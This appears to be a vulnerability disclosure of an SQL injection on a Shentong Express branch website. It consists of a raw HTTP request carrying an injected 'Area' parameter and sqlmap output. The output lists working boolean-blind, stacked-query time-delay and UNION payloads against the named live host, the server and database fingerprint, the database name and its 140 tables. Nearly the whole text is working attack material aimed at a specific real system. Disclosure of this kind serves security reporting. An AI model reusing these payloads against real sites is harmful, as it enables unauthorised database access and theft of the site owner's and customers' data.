SQL injection vulnerability in a branch site of Shentong Express
GET /Dot.asp?Area=-1' OR 1=1* -- HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.gdsto.com.cn/
Cookie: ASPSESSIONIDACBDCSSA=GANBFHOBEOMPODKONKIGHILO; ASPSESSIONIDACBADSTA=AHOJCDLCAKCKFIILHAAPCHIB
Host: www.gdsto.com.cn
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 AND 6075=6075 --
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1; waitfor delay '0:0:5'----
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 union all select null, NULL, CHAR(113)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(88)+CHAR(102)+CHAR(76)+CHAR(99)+CHAR(77)+CHAR(116)+CHAR(87)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113), NULL, NULL, NULL, NULL ----
---
Web server operating system: Windows 2008 R2 or 7
Web application technology: Microsoft IIS 7.5, ASP
Back-end DBMS: Microsoft SQL Server 2005
Database: zktime_st
[140 tables]